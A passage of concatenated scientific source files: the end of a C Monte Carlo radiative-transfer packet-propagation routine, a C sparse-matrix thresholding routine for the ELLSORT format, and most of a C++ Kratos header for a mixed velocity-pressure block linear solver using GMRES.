rpacket_get_tau_event (packet) +
delta_tau_event);
}
else
{
rpacket_reset_tau_event (packet, mt_state);
}
if ((rpacket_get_current_shell_id (packet) < storage->no_of_shells - 1
&& rpacket_get_next_shell_id (packet) == 1)
|| (rpacket_get_current_shell_id (packet) > 0
&& rpacket_get_next_shell_id (packet) == -1))
{
rpacket_set_current_shell_id (packet,
rpacket_get_current_shell_id (packet) +
rpacket_get_next_shell_id (packet));
rpacket_set_recently_crossed_boundary (packet,
rpacket_get_next_shell_id
(packet));
}
else if (rpacket_get_next_shell_id (packet) == 1)
{
rpacket_set_status (packet, TARDIS_PACKET_STATUS_EMITTED);
}
else if ((storage->reflective_inner_boundary == 0) ||
(rk_double (mt_state) > storage->inner_boundary_albedo))
{
rpacket_set_status (packet, TARDIS_PACKET_STATUS_REABSORBED);
}
else
{
double doppler_factor = rpacket_doppler_factor (packet, storage);
double comov_nu = rpacket_get_nu (packet) * doppler_factor;
double comov_energy = rpacket_get_energy (packet) * doppler_factor;
rpacket_set_mu (packet, rk_double (mt_state));
double inverse_doppler_factor = 1.0 / rpacket_doppler_factor (packet, storage);
rpacket_set_nu (packet, comov_nu * inverse_doppler_factor);
rpacket_set_energy (packet, comov_energy * inverse_doppler_factor);
rpacket_set_recently_crossed_boundary (packet, 1);
if (rpacket_get_virtual_packet_flag (packet) > 0)
{
montecarlo_one_packet (storage, packet, -2, mt_state);
}
}
}
void
montecarlo_thomson_scatter (rpacket_t * packet, storage_model_t * storage,
double distance, rk_state *mt_state)
{
double doppler_factor = move_packet (packet, storage, distance);
double comov_nu = rpacket_get_nu (packet) * doppler_factor;
double comov_energy = rpacket_get_energy (packet) * doppler_factor;
rpacket_set_mu (packet, 2.0 * rk_double (mt_state) - 1.0);
double inverse_doppler_factor = 1.0 / rpacket_doppler_factor (packet, storage);
rpacket_set_nu (packet, comov_nu * inverse_doppler_factor);
rpacket_set_energy (packet, comov_energy * inverse_doppler_factor);
rpacket_reset_tau_event (packet, mt_state);
rpacket_set_recently_crossed_boundary (packet, 0);
storage->last_interaction_type[rpacket_get_id (packet)] = 1;
if (rpacket_get_virtual_packet_flag (packet) > 0)
{
montecarlo_one_packet (storage, packet, 1, mt_state);
}
}
void
montecarlo_bound_free_scatter (rpacket_t * packet, storage_model_t * storage, double distance, rk_state *mt_state)
{
/* current position in list of continuum edges -> indicates which bound-free processes are possible */
int64_t current_continuum_id = rpacket_get_current_continuum_id(packet);
// Determine in which continuum the bf-absorption occurs
double nu = rpacket_get_nu(packet);
double chi_bf = rpacket_get_chi_boundfree(packet);
// get new zrand
double zrand = rk_double(mt_state);
double zrand_x_chibf = zrand * chi_bf;
int64_t ccontinuum = current_continuum_id; /* continuum_id of the continuum in which bf-absorption occurs */
while (storage->chi_bf_tmp_partial[ccontinuum] <= zrand_x_chibf)
{
ccontinuum++;
}
// Alternative way to choose a continuum for bf-absorption:
// error =
// binary_search(storage->chi_bf_tmp_partial, zrand_x_chibf, current_continuum_id,no_of_continuum_edges-1,&ccontinuum);
// if (error == TARDIS_ERROR_BOUNDS_ERROR) // x_insert < x[imin] -> set index equal to imin
// {
// ccontinuum = current_continuum_id;
// }
zrand = rk_double(mt_state);
if (zrand < storage->continuum_list_nu[ccontinuum] / nu)
{
// go to ionization energy
rpacket_set_status (packet, TARDIS_PACKET_STATUS_REABSORBED);
}
else
{
//go to the thermal pool
//create_kpacket(packet);
rpacket_set_status (packet, TARDIS_PACKET_STATUS_REABSORBED);
}
}
void
montecarlo_free_free_scatter(rpacket_t * packet, storage_model_t * storage, double distance, rk_state *mt_state)
{
rpacket_set_status (packet, TARDIS_PACKET_STATUS_REABSORBED);
}
void
montecarlo_line_scatter (rpacket_t * packet, storage_model_t * storage,
double distance, rk_state *mt_state)
{
int64_t line2d_idx = rpacket_get_next_line_id (packet)
* storage->no_of_shells + rpacket_get_current_shell_id (packet);
if (rpacket_get_virtual_packet (packet) == 0)
{
increment_j_blue_estimator (packet, storage, distance, line2d_idx);
}
double tau_line =
storage->line_lists_tau_sobolevs[line2d_idx];
double tau_continuum = rpacket_get_chi_continuum(packet) * distance;
double tau_combined = tau_line + tau_continuum;
rpacket_set_next_line_id (packet, rpacket_get_next_line_id (packet) + 1);
if (rpacket_get_next_line_id (packet) == storage->no_of_lines)
{
rpacket_set_last_line (packet, true);
}
if (rpacket_get_virtual_packet (packet) > 0)
{
rpacket_set_tau_event (packet,
rpacket_get_tau_event (packet) + tau_line);
}
else if (rpacket_get_tau_event (packet) < tau_combined)
{
double old_doppler_factor = move_packet (packet, storage, distance);
rpacket_set_mu (packet, 2.0 * rk_double (mt_state) - 1.0);
double inverse_doppler_factor = 1.0 / rpacket_doppler_factor (packet, storage);
double comov_energy = rpacket_get_energy (packet) * old_doppler_factor;
rpacket_set_energy (packet, comov_energy * inverse_doppler_factor);
storage->last_interaction_in_nu[rpacket_get_id (packet)] =
rpacket_get_nu (packet);
storage->last_line_interaction_in_id[rpacket_get_id (packet)] =
rpacket_get_next_line_id (packet) - 1;
storage->last_line_interaction_shell_id[rpacket_get_id (packet)] =
rpacket_get_current_shell_id (packet);
storage->last_interaction_type[rpacket_get_id (packet)] = 2;
int64_t emission_line_id = 0;
if (storage->line_interaction_id == 0)
{
emission_line_id = rpacket_get_next_line_id (packet) - 1;
}
else if (storage->line_interaction_id >= 1)
{
emission_line_id = macro_atom (packet, storage, mt_state);
}
storage->last_line_interaction_out_id[rpacket_get_id (packet)] =
emission_line_id;
rpacket_set_nu (packet,
storage->line_list_nu[emission_line_id] *
inverse_doppler_factor);
rpacket_set_nu_line (packet, storage->line_list_nu[emission_line_id]);
rpacket_set_next_line_id (packet, emission_line_id + 1);
rpacket_reset_tau_event (packet, mt_state);
rpacket_set_recently_crossed_boundary (packet, 0);
if (rpacket_get_virtual_packet_flag (packet) > 0)
{
bool virtual_close_line = false;
if (!rpacket_get_last_line (packet) &&
fabs (storage->line_list_nu[rpacket_get_next_line_id (packet)] -
rpacket_get_nu_line (packet)) <
(rpacket_get_nu_line (packet)* 1e-7))
{
virtual_close_line = true;
}
// QUESTIONABLE!!!
bool old_close_line = rpacket_get_close_line (packet);
rpacket_set_close_line (packet, virtual_close_line);
montecarlo_one_packet (storage, packet, 1, mt_state);
rpacket_set_close_line (packet, old_close_line);
virtual_close_line = false;
}
}
else
{
rpacket_set_tau_event (packet,
rpacket_get_tau_event (packet) - tau_line);
}
if (!rpacket_get_last_line (packet) &&
fabs (storage->line_list_nu[rpacket_get_next_line_id (packet)] -
rpacket_get_nu_line (packet)) < (rpacket_get_nu_line (packet)*
1e-7))
{
rpacket_set_close_line (packet, true);
}
}
static void
montecarlo_compute_distances (rpacket_t * packet, storage_model_t * storage)
{
// Check if the last line was the same nu as the current line.
if (rpacket_get_close_line (packet))
{
// If so set the distance to the line to 0.0
rpacket_set_d_line (packet, 0.0);
// Reset close_line.
rpacket_set_close_line (packet, false);
}
else
{
rpacket_set_d_boundary (packet,
compute_distance2boundary (packet, storage));
double d_line;
compute_distance2line (packet, storage, &d_line);
// FIXME MR: return status of compute_distance2line() is ignored
rpacket_set_d_line (packet, d_line);
compute_distance2continuum (packet, storage);
}
}
static montecarlo_event_handler_t
get_event_handler (rpacket_t * packet, storage_model_t * storage,
double *distance, rk_state *mt_state)
{
montecarlo_compute_distances (packet, storage);
double d_boundary = rpacket_get_d_boundary (packet);
double d_continuum = rpacket_get_d_continuum (packet);
double d_line = rpacket_get_d_line (packet);
montecarlo_event_handler_t handler;
if (d_line <= d_boundary && d_line <= d_continuum)
{
*distance = d_line;
handler = &montecarlo_line_scatter;
}
else if (d_boundary <= d_continuum)
{
*distance = d_boundary;
handler = &move_packet_across_shell_boundary;
}
else
{
*distance = d_continuum;
handler = montecarlo_continuum_event_handler(packet, storage, mt_state);
}
return handler;
}
montecarlo_event_handler_t
montecarlo_continuum_event_handler(rpacket_t * packet, storage_model_t * storage, rk_state *mt_state)
{
if (storage->cont_status == CONTINUUM_OFF)
{
return &montecarlo_thomson_scatter;
}
else
{
double zrand = (rk_double(mt_state));
double normaliz_cont_th = rpacket_get_chi_electron(packet)/rpacket_get_chi_continuum(packet);
double normaliz_cont_bf = rpacket_get_chi_boundfree(packet)/rpacket_get_chi_continuum(packet);
if (zrand < normaliz_cont_th)
{
//Return the electron scatter event function
return &montecarlo_thomson_scatter;
}
else if (zrand < (normaliz_cont_th + normaliz_cont_bf))
{
//Return the bound-free scatter event function
return &montecarlo_bound_free_scatter;
}
else
{
//Return the free-free scatter event function
return &montecarlo_free_free_scatter;
}
}
}
int64_t
montecarlo_one_packet_loop (storage_model_t * storage, rpacket_t * packet,
int64_t virtual_packet, rk_state *mt_state)
{
rpacket_set_tau_event (packet, 0.0);
rpacket_set_nu_line (packet, 0.0);
rpacket_set_virtual_packet (packet, virtual_packet);
rpacket_set_status (packet, TARDIS_PACKET_STATUS_IN_PROCESS);
// Initializing tau_event if it's a real packet.
if (virtual_packet == 0)
{
rpacket_reset_tau_event (packet,mt_state);
}
// For a virtual packet tau_event is the sum of all the tau's that the packet passes.
while (rpacket_get_status (packet) == TARDIS_PACKET_STATUS_IN_PROCESS)
{
// Check if we are at the end of line list.
if (!rpacket_get_last_line (packet))
{
rpacket_set_nu_line (packet,
storage->
line_list_nu[rpacket_get_next_line_id
(packet)]);
}
double distance;
get_event_handler (packet, storage, &distance, mt_state) (packet, storage,
distance, mt_state);
if (virtual_packet > 0 && rpacket_get_tau_event (packet) > 10.0)
{
rpacket_set_tau_event (packet, 100.0);
rpacket_set_status (packet, TARDIS_PACKET_STATUS_EMITTED);
}
}
if (virtual_packet > 0)
{
rpacket_set_energy (packet,
rpacket_get_energy (packet) * exp (-1.0 *
rpacket_get_tau_event
(packet)));
}
return rpacket_get_status (packet) ==
TARDIS_PACKET_STATUS_REABSORBED ? 1 : 0;
}
void
montecarlo_main_loop(storage_model_t * storage, int64_t virtual_packet_flag, int nthreads, unsigned long seed)
{
storage->virt_packet_nus = (double *)malloc(sizeof(double) * storage->no_of_packets);
storage->virt_packet_energies = (double *)malloc(sizeof(double) * storage->no_of_packets);
storage->virt_packet_last_interaction_in_nu = (double *)malloc(sizeof(double) * storage->no_of_packets);
storage->virt_packet_last_interaction_type = (int64_t *)malloc(sizeof(int64_t) * storage->no_of_packets);
storage->virt_packet_last_line_interaction_in_id = (int64_t *)malloc(sizeof(int64_t) * storage->no_of_packets);
storage->virt_packet_last_line_interaction_out_id = (int64_t *)malloc(sizeof(int64_t) * storage->no_of_packets);
storage->virt_packet_count = 0;
storage->virt_array_size = storage->no_of_packets;
#ifdef WITHOPENMP
fprintf(stderr, "Running with OpenMP - %d threads\n", nthreads);
omp_set_dynamic(0);
omp_set_num_threads(nthreads);
#pragma omp parallel
{
rk_state mt_state;
rk_seed (seed + omp_get_thread_num(), &mt_state);
#pragma omp for
#else
fprintf(stderr, "Running without OpenMP\n");
rk_state mt_state;
rk_seed (seed, &mt_state);
#endif
for (int64_t packet_index = 0; packet_index < storage->no_of_packets; packet_index++)
{
int reabsorbed = 0;
rpacket_t packet;
rpacket_set_id(&packet, packet_index);
rpacket_init(&packet, storage, packet_index, virtual_packet_flag);
if (virtual_packet_flag > 0)
{
reabsorbed = montecarlo_one_packet(storage, &packet, -1, &mt_state);
}
reabsorbed = montecarlo_one_packet(storage, &packet, 0, &mt_state);
storage->output_nus[packet_index] = rpacket_get_nu(&packet);
if (reabsorbed == 1)
{
storage->output_energies[packet_index] = -rpacket_get_energy(&packet);
}
else
{
storage->output_energies[packet_index] = rpacket_get_energy(&packet);
}
}
#ifdef WITHOPENMP
}
#endif
}
|
bml_threshold_ellsort_typed.c | #include "../../macros.h"
#include "../../typed.h"
#include "../bml_allocate.h"
#include "../bml_parallel.h"
#include "../bml_threshold.h"
#include "../bml_types.h"
#include "bml_allocate_ellsort.h"
#include "bml_threshold_ellsort.h"
#include "bml_types_ellsort.h"
#include <complex.h>
#include <math.h>
#include <stdlib.h>
#include <string.h>
#ifdef _OPENMP
#include <omp.h>
#endif
/** Threshold a matrix.
*
* \ingroup threshold_group
*
* \param A The matrix to be thresholded
* \param threshold Threshold value
* \return the thresholded A
*/
bml_matrix_ellsort_t *TYPED_FUNC(
bml_threshold_new_ellsort) (
bml_matrix_ellsort_t * A,
double threshold)
{
int N = A->N;
int M = A->M;
bml_matrix_ellsort_t *B =
TYPED_FUNC(bml_zero_matrix_ellsort) (N, M, A->distribution_mode);
REAL_T *A_value = (REAL_T *) A->value;
int *A_index = A->index;
int *A_nnz = A->nnz;
int *A_localRowMin = A->domain->localRowMin;
int *A_localRowMax = A->domain->localRowMax;
REAL_T *B_value = (REAL_T *) B->value;
int *B_index = B->index;
int *B_nnz = B->nnz;
int myRank = bml_getMyRank();
#pragma omp parallel for \
shared(N, M, A_value, A_index, A_nnz) \
shared(A_localRowMin, A_localRowMax, myRank) \
shared(B_value, B_index, B_nnz)
//for (int i = 0; i < N; i++)
for (int i = A_localRowMin[myRank]; i < A_localRowMax[myRank]; i++)
{
for (int j = 0; j < A_nnz[i]; j++)
{
if (is_above_threshold(A_value[ROWMAJOR(i, j, N, M)], threshold))
{
B_value[ROWMAJOR(i, B_nnz[i], N, M)] =
A_value[ROWMAJOR(i, j, N, M)];
B_index[ROWMAJOR(i, B_nnz[i], N, M)] =
A_index[ROWMAJOR(i, j, N, M)];
B_nnz[i]++;
}
}
}
return B;
}
/** Threshold a matrix in place.
*
* \ingroup threshold_group
*
* \param A The matrix to be thresholded
* \param threshold Threshold value
* \return the thresholded A
*/
void TYPED_FUNC(
bml_threshold_ellsort) (
bml_matrix_ellsort_t * A,
double threshold)
{
int N = A->N;
int M = A->M;
REAL_T *A_value = (REAL_T *) A->value;
int *A_index = A->index;
int *A_nnz = A->nnz;
int *A_localRowMin = A->domain->localRowMin;
int *A_localRowMax = A->domain->localRowMax;
int myRank = bml_getMyRank();
int rlen;
#pragma omp parallel for \
private(rlen) \
shared(N,M,A_value,A_index,A_nnz) \
shared(A_localRowMin, A_localRowMax, myRank)
//for (int i = 0; i < N; i++)
for (int i = A_localRowMin[myRank]; i < A_localRowMax[myRank]; i++)
{
rlen = 0;
for (int j = 0; j < A_nnz[i]; j++)
{
if (is_above_threshold(A_value[ROWMAJOR(i, j, N, M)], threshold))
{
if (rlen < j)
{
A_value[ROWMAJOR(i, rlen, N, M)] =
A_value[ROWMAJOR(i, j, N, M)];
A_index[ROWMAJOR(i, rlen, N, M)] =
A_index[ROWMAJOR(i, j, N, M)];
}
rlen++;
}
}
A_nnz[i] = rlen;
}
}
|
mixedup_linear_solver.h | // | / |
// ' / __| _` | __| _ \ __|
// . \ | ( | | ( |\__ `
// _|\_\_| \__,_|\__|\___/ ____/
// Multi-Physics
//
// License: BSD License
// Kratos default license: kratos/license.txt
//
// Main authors: Riccardo Rossi
//
#if !defined(KRATOS_MIXEDUP_SOLVER_H_INCLUDED )
#define KRATOS_MIXEDUP_SOLVER_H_INCLUDED
// System includes
#include <string>
#include <iostream>
#include <sstream>
#include <cstddef>
// External includes
// Project includes
#include "includes/define.h"
#include "reorderer.h"
#include "includes/model_part.h"
#include "linear_solvers/iterative_solver.h"
#include <boost/numeric/ublas/vector.hpp>
#include "utilities/openmp_utils.h"
namespace Kratos
{
///@name Kratos Globals
///@{
///@}
///@name Type Definitions
///@{
///@}
///@name Enum's
///@{
///@}
///@name Functions
///@{
///@}
///@name Kratos Classes
///@{
/** This solver is designed for the solution of mixed U-P problems.
* It uses a block structure diving the matrix in UU PP UP PU blocks
* and uses "standard" linear solvers for the different blocks as well as a GMRES for the outer part
*/
template<class TSparseSpaceType, class TDenseSpaceType,
class TPreconditionerType = Preconditioner<TSparseSpaceType, TDenseSpaceType>,
class TReordererType = Reorderer<TSparseSpaceType, TDenseSpaceType> >
class MixedUPLinearSolver :
public IterativeSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>
{
public:
///@name Type Definitions
///@{
/// Pointer definition of MixedUPLinearSolver
KRATOS_CLASS_POINTER_DEFINITION (MixedUPLinearSolver);
typedef IterativeSolver<TSparseSpaceType, TDenseSpaceType, TPreconditionerType, TReordererType> BaseType;
typedef typename TSparseSpaceType::MatrixType SparseMatrixType;
typedef typename TSparseSpaceType::VectorType VectorType;
typedef typename TDenseSpaceType::MatrixType DenseMatrixType;
typedef typename TDenseSpaceType::VectorType DenseVectorType;
typedef std::size_t SizeType;
///@}
///@name Life Cycle
///@{
/// Default constructor.
MixedUPLinearSolver (typename LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType>::Pointer psolver_UU_block,
typename LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType>::Pointer psolver_PP_block,
double NewMaxTolerance,
unsigned int NewMaxIterationsNumber,
unsigned int m
) : BaseType (NewMaxTolerance, NewMaxIterationsNumber)
{
//saving the linear solvers to be used in the solution process
mpsolver_UU_block = psolver_UU_block;
mpsolver_PP_block = psolver_PP_block;
mBlocksAreAllocated = false;
mis_initialized = false;
mm = m;
}
MixedUPLinearSolver(Parameters settings,
typename LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType>::Pointer psolver_UU_block,
typename LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType>::Pointer psolver_PP_block
): BaseType ()
{
KRATOS_TRY
Parameters default_parameters( R"(
{
"solver_type": "MixedUPLinearSolver",
"velocity_solver" : {
"solver_type":"BICGSTABSolver"
},
"pressure_solver" : {
"solver_type":"CGSolver"
}
"tolerance" : 1.0e-6,
"max_iteration" : 200,
"gmres_krylov_space_dimension" : 100
} )" );
//now validate agains defaults -- this also ensures no type mismatch
settings.ValidateAndAssignDefaults(default_parameters);
this->SetTolerance( settings["tolerance"].GetDouble() );
this->SetMaxIterationsNumber( settings["max_iteration"].GetInt() );
mm = settings["gmres_krylov_space_dimension"].GetInt();
//storing other data
mpsolver_UU_block = psolver_UU_block;
mpsolver_PP_block = psolver_PP_block;
mBlocksAreAllocated = false;
mis_initialized = false;
KRATOS_CATCH("")
}
/// Copy constructor.
MixedUPLinearSolver (const MixedUPLinearSolver& Other)
{
KRATOS_THROW_ERROR (std::logic_error,"copy constructor not correctly implemented","");
}
/// Destructor.
~MixedUPLinearSolver() override {}
///@}
///@name Operators
///@{
/// Assignment operator.
MixedUPLinearSolver& operator= (const MixedUPLinearSolver& Other)
{
return *this;
}
///@}
///@name Operations
///@{
/** This function is designed to be called as few times as possible. It creates the data structures
* that only depend on the connectivity of the matrix (and not on its coefficients)
* so that the memory can be allocated once and expensive operations can be done only when strictly
* needed
@param rA. System matrix
@param rX. Solution vector. it's also the initial guess for iterative linear solvers.
@param rB. Right hand side vector.
*/
void Initialize (SparseMatrixType& rA, VectorType& rX, VectorType& rB) override
{
if (mBlocksAreAllocated == true)
{
mpsolver_UU_block->Initialize(mK, mu, mru);
mpsolver_PP_block->Initialize(mS, mp, mrp);
mis_initialized = true;
}
else
{
std::cout << "linear solver intialization is deferred to the moment at which blocks are available" << std::endl;
}
}
/** This function is designed to be called every time the coefficients change in the system
* that is, normally at the beginning of each solve.
* For example if we are implementing a direct solver, this is the place to do the factorization
* so that then the backward substitution can be performed effectively more than once
@param rA. System matrix
@param rX. Solution vector. it's also the initial guess for iterative linear solvers.
@param rB. Right hand side vector.
*/
void InitializeSolutionStep (SparseMatrixType& rA, VectorType& rX, VectorType& rB) override
{
//copy to local matrices
if (mBlocksAreAllocated == false)
{
FillBlockMatrices (true, rA, mK, mG, mD, mS);
mBlocksAreAllocated = true;
}
else
{
FillBlockMatrices (false, rA, mK, mG, mD, mS);
mBlocksAreAllocated = true;
}
if(mis_initialized == false) this->Initialize(rA,rX,rB);
//initialize solvers
mpsolver_UU_block->InitializeSolutionStep(mK, mu, mru);
mpsolver_PP_block->InitializeSolutionStep(mS, mp, mrp);
}
/** This function actually performs the solution work, eventually taking advantage of what was done before in the
* Initialize and InitializeSolutionStep functions.
@param rA. System matrix
@param rX. Solution vector. it's also the initial guess for iterative linear solvers.
@param rB. Right hand side vector.
*/
void PerformSolutionStep (SparseMatrixType& rA, VectorType& rX, VectorType& rB) override
{
unsigned int m = mm;
unsigned int max_iter = BaseType::GetMaxIterationsNumber();
double tol = BaseType::GetTolerance();
gmres_solve (rA,rX,rB,m,max_iter,tol);
}
/** This function is designed to be called at the end of the solve step.
* for example this is the place to remove any data that we do not want to save for later
@param rA. System matrix
@param rX. Solution vector. it's also the initial guess for iterative linear solvers.
@param rB. Right hand side vector.
*/
void FinalizeSolutionStep (SparseMatrixType& rA, VectorType& rX, VectorType& rB) override
{
mpsolver_UU_block->FinalizeSolutionStep(mK, mu, mru);
mpsolver_PP_block->FinalizeSolutionStep(mS, mp, mrp);
}
/** This function is designed to clean up all internal data in the solver.
* Clear is designed to leave the solver object as if newly created.
* After a clear a new Initialize is needed
*/
void Clear() override
{
mK.clear();
mG.clear();
mD.clear();
mS.clear();
mBlocksAreAllocated = false;
mpsolver_UU_block->Clear();
mpsolver_PP_block->Clear();
mu.clear();
mp.clear();
mru.clear();
mrp.clear();
mis_initialized = false;
}
/** Normal solve method.
Solves the linear system Ax=b and puts the result on SystemVector& rX.
rVectorx is also th initial guess for iterative methods.
@param rA. System matrix
@param rX. Solution vector. it's also the initial
guess for iterative linear solvers.
@param rB. Right hand side vector.
*/
bool Solve(SparseMatrixType& rA, VectorType& rX, VectorType& rB) override
{
if (mis_initialized == false)
this->Initialize (rA,rX,rB);
this->InitializeSolutionStep (rA,rX,rB);
this->PerformSolutionStep (rA,rX,rB);
this->FinalizeSolutionStep (rA,rX,rB);
return false;
}
/** Multi solve method for solving a set of linear systems with same coefficient matrix.
Solves the linear system Ax=b and puts the result on SystemVector& rX.
rVectorx is also th initial guess for iterative methods.
@param rA. System matrix
@param rX. Solution vector. it's also the initial
guess for iterative linear solvers.
@param rB. Right hand side vector.
*/
bool Solve (SparseMatrixType& rA, DenseMatrixType& rX, DenseMatrixType& rB) override
{
return false;
}
/** Eigenvalue and eigenvector solve method for derived eigensolvers */
void Solve (SparseMatrixType& K,
SparseMatrixType& M,
DenseVectorType& Eigenvalues,
DenseMatrixType& Eigenvectors) override
{}
/** Some solvers may require a minimum degree of knowledge of the structure of the matrix. To make an example
* when solving a mixed u-p problem, it is important to identify the row associated to v and p.
* another example is the automatic prescription of rotation null-space for smoothed-aggregation solvers
* which require knowledge on the spatial position of the nodes associated to a given dof.
* This function tells if the solver requires such data
*/
bool AdditionalPhysicalDataIsNeeded() override
{
return true;
}
/** Some solvers may require a minimum degree of knowledge of the structure of the matrix. To make an example
* when solving a mixed u-p problem, it is important to identify the row associated to v and p.
* another example is the automatic prescription of rotation null-space for smoothed-aggregation solvers
* which require knowledge on the spatial position of the nodes associated to a given dof.
* This function is the place to eventually provide such data
*/
void ProvideAdditionalData (
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB,
typename ModelPart::DofsArrayType& rdof_set,
ModelPart& r_model_part
) override
{
//count pressure dofs
unsigned int n_pressure_dofs = 0;
unsigned int tot_active_dofs = 0;
for (ModelPart::DofsArrayType::iterator it = rdof_set.begin(); it!=rdof_set.end(); it++)
{
if (it->EquationId() < rA.size1())
{
tot_active_dofs += 1;
if (it->GetVariable().Key() == PRESSURE)
n_pressure_dofs += 1;
}
}
if (tot_active_dofs != rA.size1() )
KRATOS_THROW_ERROR (std::logic_error,"total system size does not coincide with the free dof map","");
//resize arrays as needed
mpressure_indices.resize (n_pressure_dofs,false);
unsigned int other_dof_size = tot_active_dofs - n_pressure_dofs;
mother_indices.resize (other_dof_size,false);
mglobal_to_local_indexing.resize (tot_active_dofs,false);
mis_pressure_block.resize (tot_active_dofs,false);
//construct aux_lists as needed
//"other_counter[i]" i will contain the position in the global system of the i-th NON-pressure node
//"pressure_counter[i]" will contain the in the global system of the i-th NON-pressure node
//
//mglobal_to_local_indexing[i] will contain the position in the local blocks of the
unsigned int pressure_counter = 0;
unsigned int other_counter = 0;
unsigned int global_pos = 0;
for (ModelPart::DofsArrayType::iterator it = rdof_set.begin(); it!=rdof_set.end(); it++)
{
if (it->EquationId() < rA.size1())
{
if (it->GetVariable().Key() == PRESSURE)
{
mpressure_indices[pressure_counter] = global_pos;
mglobal_to_local_indexing[global_pos] = pressure_counter;
mis_pressure_block[global_pos] = true;
pressure_counter++;
}
else
{
mother_indices[other_counter] = global_pos;
mglobal_to_local_indexing[global_pos] = other_counter;
mis_pressure_block[global_pos] = false;
other_counter++;
}
global_pos++;
}
}
}
///@}
///@name Access
///@{
///@}
///@name Inquiry
///@{
///@}
///@name Input and output
///@{
/// Turn back information as a string.
std::string Info() const override
{
return "Linear solver";
}
/// Print information about this object.
void PrintInfo (std::ostream& rOStream) const override
{
rOStream << "Linear solver";
}
/// Print object's data.
void PrintData (std::ostream& rOStream) const override
{
}
///@}
///@name Friends
///@{
///@}
protected:
///@name Protected static Member Variables
///@{
///@}
///@name Protected member Variables
///@{
///@}
///@name Protected Operators
///@{
///this function generates the subblocks of matrix A
///as A = ( K G ) u
/// ( D S ) p
/// subblocks are allocated or nor depending on the value of "need_allocation"
void FillBlockMatrices (bool need_allocation, SparseMatrixType& rA, SparseMatrixType& K, SparseMatrixType& G, SparseMatrixType& D, SparseMatrixType& S )
{
KRATOS_TRY
//get access to A data
const std::size_t* index1 = rA.index1_data().begin();
const std::size_t* index2 = rA.index2_data().begin();
const double* values = rA.value_data().begin();
SparseMatrixType L(mpressure_indices.size(),mpressure_indices.size() );
if (need_allocation == true)
{
K.clear();
G.clear();
D.clear();
S.clear();
L.clear();
//do allocation
K.resize (mother_indices.size() ,mother_indices.size() );
G.resize (mother_indices.size() ,mpressure_indices.size() );
D.resize (mpressure_indices.size(),mother_indices.size() );
S.resize (mpressure_indices.size(),mpressure_indices.size() );
mrp.resize(mpressure_indices.size() );
mru.resize(mother_indices.size() );
mp.resize(mpressure_indices.size());
mu.resize(mother_indices.size());
//KRATOS_WATCH (mglobal_to_local_indexing);
//allocate the blocks by push_back
for (unsigned int i=0; i<rA.size1(); i++)
{
unsigned int row_begin = index1[i];
unsigned int row_end = index1[i+1];
unsigned int local_row_id = mglobal_to_local_indexing[i];
if ( mis_pressure_block[i] == false) //either K or G
{
for (unsigned int j=row_begin; j<row_end; j++)
{
unsigned int col_index = index2[j];
double value = values[j];
unsigned int local_col_id = mglobal_to_local_indexing[col_index];
if (mis_pressure_block[col_index] == false) //K block
K.push_back ( local_row_id, local_col_id, value);
else //G block
G.push_back ( local_row_id, local_col_id, value);
}
}
else //either D or S
{
for (unsigned int j=row_begin; j<row_end; j++)
{
unsigned int col_index = index2[j];
double value = values[j];
unsigned int local_col_id = mglobal_to_local_indexing[col_index];
if (mis_pressure_block[col_index] == false) //D block
D.push_back ( local_row_id, local_col_id, value);
else //S block
L.push_back ( local_row_id, local_col_id, value);
}
}
}
//allocate the schur complement
ConstructSystemMatrix(S,G,D,L);
VectorType diagK (mother_indices.size() );
ComputeDiagonalByLumping (K,diagK);
//fill the shur complement
CalculateShurComplement(S,K,G,D,L,diagK);
}
else //allocation is not needed so only do copying
{
for (unsigned int i=0; i<rA.size1(); i++)
{
unsigned int row_begin = index1[i];
unsigned int row_end = index1[i+1];
unsigned int local_row_id = mglobal_to_local_indexing[i];
if ( mis_pressure_block[i] == false ) //either K or G
{
for (unsigned int j=row_begin; j<row_end; j++)
{
unsigned int col_index = index2[j];
double value = values[j];
unsigned int local_col_id = mglobal_to_local_indexing[col_index];
if (mis_pressure_block[col_index] == false) //K block
K( local_row_id, local_col_id) = value;
else //G block
G( local_row_id, local_col_id) = value;
}
}
else //either D or S
{
for (unsigned int j=row_begin; j<row_end; j++)
{
unsigned int col_index = index2[j];
double value = values[j];
unsigned int local_col_id = mglobal_to_local_indexing[col_index];
if (mis_pressure_block[col_index] == false) //D block
D( local_row_id, local_col_id) = value;
else //S block
L( local_row_id, local_col_id) = value;
}
}
}
VectorType diagK (mother_indices.size() );
ComputeDiagonalByLumping (K,diagK);
//fill the shur complement
CalculateShurComplement(S,K,G,D,L,diagK);
}
KRATOS_CATCH ("")
}
///@}
///@name Protected Operations
///@{
///@}
///@name Protected Access
///@{
///@}
///@name Protected Inquiry
///@{
///@}
///@name Protected LifeCycle
///@{
///@}
private:
///@name Static Member Variables
///@{
///@}
///@name Member Variables
///@{
/// A counted pointer to the reorderer object.
typename LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType>::Pointer mpsolver_UU_block;
typename LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType>::Pointer mpsolver_PP_block;
unsigned int mm;
bool mBlocksAreAllocated;
bool mis_initialized;
DenseVector<unsigned int> mpressure_indices;
DenseVector<unsigned int> mother_indices;
DenseVector<int> mglobal_to_local_indexing;
DenseVector<int> mis_pressure_block;
SparseMatrixType mK;
SparseMatrixType mG;
SparseMatrixType mD;
SparseMatrixType mS;
VectorType mrp;
VectorType mru;
VectorType mp;
VectorType mu;
///@}
///@name Private Operators
///@{
inline void GeneratePlaneRotation (const double &dx, const double &dy, double &cs, double &sn)
{
if (dy == 0.0)
{
cs = 1.0;
sn = 0.0;
}
else if (dx == 0.0)
{
cs = 0.0;
sn = 1.0;
}
else
{
const double rnorm = 1.0/sqrt (dx*dx + dy*dy);
cs = fabs (dx) * rnorm;
sn = cs * dy / dx;
}
}
inline void ApplyPlaneRotation (double &dx, double &dy, const double &cs, const double &sn)
{
double temp = cs * dx + sn * dy;
dy = cs * dy - sn * dx;
dx = temp;
}
void Update (VectorType& y, VectorType& x, int k, Matrix& h, VectorType& s, std::vector< VectorType >& V)
{
for (unsigned int i=0; i<s.size(); i++)
y[i] = s[i];
/* for(unsigned int i=s.size(); i<y.size(); i++)
y[i] = 0.0;*/
// Backsolve:
for (int i = k; i >= 0; --i)
